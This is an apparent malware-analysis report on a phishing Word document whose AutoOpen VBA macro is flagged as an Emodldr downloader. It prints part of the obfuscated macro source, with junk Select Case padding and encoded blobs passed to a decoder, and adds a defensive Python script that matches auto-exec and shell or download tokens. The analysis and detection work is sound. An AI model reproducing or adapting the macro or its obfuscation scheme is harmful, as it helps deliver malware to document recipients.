Verdict: MALICIOUS
Risk Score: 224

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1105 Ingress Tool Transfer
The sample is a malicious Office document carrying a VBA macro. The recovered source declares an `AutoOpen` entry point and calls `CreateObject`, so the macro runs as soon as the document is opened with macros enabled and instantiates a COM object to do its work. ClamAV's `Doc.Malware.Emodldr-10025032-0` signature and the heuristic hits together point to a downloader that fetches a second-stage payload; the signature name ties it to the ClamAV Emodldr family, but no firmer attribution is possible from this report. The visible source is heavily obfuscated: `Select Case` blocks keyed on variables that are never assigned in the recovered source (no branch ever matches, so they are junk padding), random identifiers, and `On Error Resume Next` to swallow failures, interleaved with calls to a string-decoder helper `bNcjdY(blob, n, length)` over long base64-like blobs. The decoder body and the `CreateObject` call itself fall outside the truncated preview, so the download URL and the execution chain cannot be recovered here. The next step for an analyst is to pull the full 71 KB `macros.bas` artifact, recover `bNcjdY`, and decode the blobs (or emulate the macro with a tool such as ViperMonkey) to obtain the second-stage URL and command line.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0.
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: The macro defines an AutoOpen procedure, so it runs when the document is opened.
- CreateObject call [high] OLE_VBA_CREATEOBJ: The macro calls CreateObject, typically used to instantiate WScript.Shell, XMLHTTP or a similar COM object for download and execution.
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat: the artifacts table below shows that olevba did recover the VBA project, so on this sample the finding duplicates the VBA findings above rather than adding evidence.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI found in ordinary Office files, not a network indicator; any download URL would be inside the encoded blobs and was not recovered.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 71468 bytes |

SHA-256 of macros.bas: e5db338fba4dbe85781bd5093671083c61ca1712a8d72b574a826f9384aad058

Detection (carved artifact)
- ClamAV: No threats found. The Emodldr signature matched the containing document; the extracted source text on its own does not match a signature.
- Obfuscation or payload: likely. The carved artifact contains 24 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script)

Two modules are concatenated in the dump: the `ThisDocument` attributes (module `COwjhRKSjDhlD`) followed by the `BJHkQRC` module that holds the decoder calls.

```vba
Attribute VB_Name = "COwjhRKSjDhlD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "BJHkQRC"
Function WwBnwUYaTM()
On Error Resume Next
Select Case mpDMcK
Case 13118
OGJqh = CWRNOf
lDtrnE = JfrRR
aJGYvB = Cos(29946 * CBool(8684))
Case 63352
YqjMR = 61333
BvJkBm = Fix(17906)
oGptj = Oct(28069)
End Select
Wvnwr = bNcjdY("jr2DAxAANAIGAmBwMAIDA1AANAUGA2AQOAIDA4AAMAIDA2AwNAQGA3AQMAIDAyAQYAgDAlBAZAUtbVj,", 6 + 0, 72 + 0)
Select Case YkYsQt
Case 34769
PnECU = Gszdl
WILZXz = HvZLz
hRwnYP = Cos(329 * CBool(67854))
Case 66455
wwjoUh = 25283
PzYVQY = Fix(97510)
SqKRq = Oct(54627)
End Select
Select Case IzCaT
Case 87076
wdwNSV = Cmhwni
YCjss = kjLsPj
BKiIn = Cos(76512 * CBool(37562))
Case 11276
jZwBdZ = 91490
NGDBku = Fix(36053)
aHDMRG = Oct(97007)
End Select
qqTtNWoKir = bNcjdY("dC6z0aAIDAhBQOAUDA2AQMAMGAmBQNAADAxAAOAYGA2AQOAgDAyAQNAUGAxAQZAADAlBAZAgDA5AwMAMDAkBQYAUDA5AQNAYDAzAgMAgDA4AQOAgDA0AgMAMDAmBAMAUGAxAAZAYDAwAgZAMGA3AQOAcDAiBgZAEDA1AQNAMGA0AAZAcLl", 3 + 0, 170 + 0)
Select Case IlrEZJ
Case 99412
MYTKv = HKnXiI
LRPPbM = QsidaN
shrPEH = Cos(76923 * CBool(79994))
Case 22093
IljAsZ = 88348
pCwTco = Fix(96250)
TzTqqj = Oct(66099)
End Select
Select Case BWKRXI
Case 78759
NWSwYj = tqjvia
aclwW = tSIAoD
ijGVh = Cos(57464 * CBool(28074))
Case 80451
SGLGIB = 34736
GRVuw = Fix(64290)
amOGvO = Oct(35819)
End Select
DtkJG = bNcjdY("lbfdNAYDAkBAZAUGAyAwNAYDAwAgNAEDA5AgNAMDAzAQOAMDAwAgMAUDAmBgNAkDAxAAMAYGA1AANAEGAyAwNAYDAzAgYAMDA3AQZAYDA4AgYAUGAwAgYAEGA5AwYAYDAwAAMAUGAzAANAUGAzAgYAQDAiBANAYGAkBQNAgDAiBQMAUGA4AAMAkDA4AQMAYDA1Aw3djFh", 6 + 0, 192 + 0)
Select Case VJEMk
Case 26940
EMQzK = lQSrAC
Wibiza = vPIuOz
pwDohs = Cos(85872 * CBool(25438))
Case 16703
zWBpVw = 27339
MZkniW = Fix(25556)
SSoDW = Oct(65613)
End Select
Select Case jUACmo
Case 52967
qoMiCv = mbBAtz
jTzptw = TfBTj
CfhjFf = Cos(78495 * CBool(70806))
Case 10010
siZEf = 79489
Lfmzl = Fix(63136)
wuiWW = Oct(17121)
End Select
PYaUOwTv = bNcjdY("Xn%AEDAlBANAEDAyAQYAUDAkBwYAgDAzAQNAIGA0AgYAQDAxAwM3wDz", 5 + 0, 48 + 0)
Select Case PTVhH
Case 87625
vOKwi = FHUsqi
qnwaRw = kKBRNw
dPDXY = Cos(91864 * CBool(64273))
Case 31257
cAGkz = 79321
mjsfUb = Fix(44273)
PIQkkN = Oct(85890)
End Select
Select Case fvwpn
Case 8049
sGiFc = FEwzC
KGlAl = LQfhr
BjDmwb = Cos(20495 * CBool(38537))
Case 16246
LsQNHI = 64635
HAWrN = Fix(11521)
vNXbno = Oct(20994)
End Select
sjhBjDTAV = bNcjdY("9SDA5AAZAknL6i", 5 + 0, 8 + 0)
Select Case CDtzT
Case 10787
miwcu = kXKCiV
rFJVz = DOnsUt
dNJOL = Cos(26592 * CBool(9284))
Case 71466
ovkLA = 20818
MYFTlX = Fix(93987)
XAcBIz = Oct(81713)
End Select
Select Case mfWRK
Case 72244
EwAutq = GrlZji
zAplj = jBtfE
OljmNA = Cos(37871 * CBool(23346))
Case 1226
iTRXtp = 87373
jVSwmi = Fix(64345)
iZBDCV = Oct(80723)
End Select
TAtKBMDO = bNcjdY("EVCKwYAUGAmBANAgDA5AAZAYDA2AAO
```
... (truncated)
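The OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic (auto-exec token co-occurring with shell/download/object-execution tokens) and the "long base64-like blob" count in the artifact triage can both be reproduced with a few lines of static analysis. The script below is an added example written for this page, not the analyzer's own code: it runs over macro source text rather than the compiled p-code stream, the token lists are my choice, and the sample macro is constructed to mirror the shape of the preview above (junk `Select Case` block, `bNcjdY` decoder calls over two of the report's blobs, an `AutoOpen` stub) rather than being the sample's code.

```python
import re

# Auto-execution entry points that Word or Excel invoke without user action.
AUTOEXEC_TOKENS = ("AutoOpen", "Auto_Open", "AutoExec", "Document_Open",
                   "Workbook_Open", "AutoClose", "Document_Close")

# Tokens that hand control to a COM object, a shell, or the network.
EXEC_TOKENS = ("CreateObject", "GetObject", "Shell", "WScript.Shell",
               "URLDownloadToFile", "XMLHTTP", "WinHttpRequest", "powershell")

_B64_ALPHABET = frozenset(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")
_STRING_LITERAL = re.compile(r'"([^"\r\n]*)"')


def find_tokens(src, tokens):
    """Return the tokens present in src as whole identifiers (VBA is case-insensitive)."""
    found = []
    for tok in tokens:
        pattern = r"(?<![A-Za-z0-9_])" + re.escape(tok) + r"(?![A-Za-z0-9_])"
        if re.search(pattern, src, re.IGNORECASE):
            found.append(tok)
    return found


def base64_like_blobs(src, min_len=32, min_ratio=0.9):
    """String literals of at least min_len chars made mostly of base64 alphabet.

    The ratio check is deliberately loose: the blobs in this report carry stray
    characters such as ',' and '%' that a strict base64 decoder would reject,
    which is why a per-character ratio beats a strict base64 regex here.
    """
    blobs = []
    for lit in _STRING_LITERAL.findall(src):
        if len(lit) < min_len:
            continue
        ratio = sum(c in _B64_ALPHABET for c in lit) / len(lit)
        if ratio >= min_ratio:
            blobs.append(lit)
    return blobs


def triage(src):
    """Static triage in the spirit of the report's heuristics (my approximation)."""
    autoexec = find_tokens(src, AUTOEXEC_TOKENS)
    execs = find_tokens(src, EXEC_TOKENS)
    blobs = base64_like_blobs(src)
    # Mirrors OLE_VBA_PCODE_AUTOEXEC_EXEC: an auto-exec token together with
    # at least one execution/download token.
    autoexec_with_exec = bool(autoexec) and bool(execs)
    return {
        "autoexec_tokens": autoexec,
        "exec_tokens": execs,
        "base64_like_blobs": len(blobs),
        "autoexec_with_exec": autoexec_with_exec,
        "verdict": "suspicious" if autoexec_with_exec or len(blobs) >= 3
                   else "benign-looking",
    }


# Constructed sample (not the analyzed file's code): same shape as the preview,
# with an AutoOpen stub and a CreateObject call added to exercise the checks.
SAMPLE_MACRO = r'''
Attribute VB_Name = "BJHkQRC"
Sub AutoOpen()
    On Error Resume Next
    WwBnwUYaTM
End Sub
Function WwBnwUYaTM()
    On Error Resume Next
    Select Case mpDMcK
    Case 13118
        aJGYvB = Cos(29946 * CBool(8684))
    End Select
    Wvnwr = bNcjdY("jr2DAxAANAIGAmBwMAIDA1AANAUGA2AQOAIDA4AAMAIDA2AwNAQGA3AQMAIDAyAQYAgDAlBAZAUtbVj,", 6 + 0, 72 + 0)
    PYaUOwTv = bNcjdY("Xn%AEDAlBANAEDAyAQYAUDAkBwYAgDAzAQNAIGA0AgYAQDAxAwM3wDz", 5 + 0, 48 + 0)
    sjhBjDTAV = bNcjdY("9SDA5AAZAknL6i", 5 + 0, 8 + 0)
    Set hXw = CreateObject(Wvnwr)
End Function
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

Run against the full `macros.bas` artifact the blob count should approach the report's 24; on the constructed sample it finds two blobs (the 14-character literal falls below the length floor) and flags the AutoOpen-plus-CreateObject pairing. The decoder `bNcjdY` is deliberately not reimplemented: its body is outside the truncated preview and guessing it would invent behaviour the page does not show.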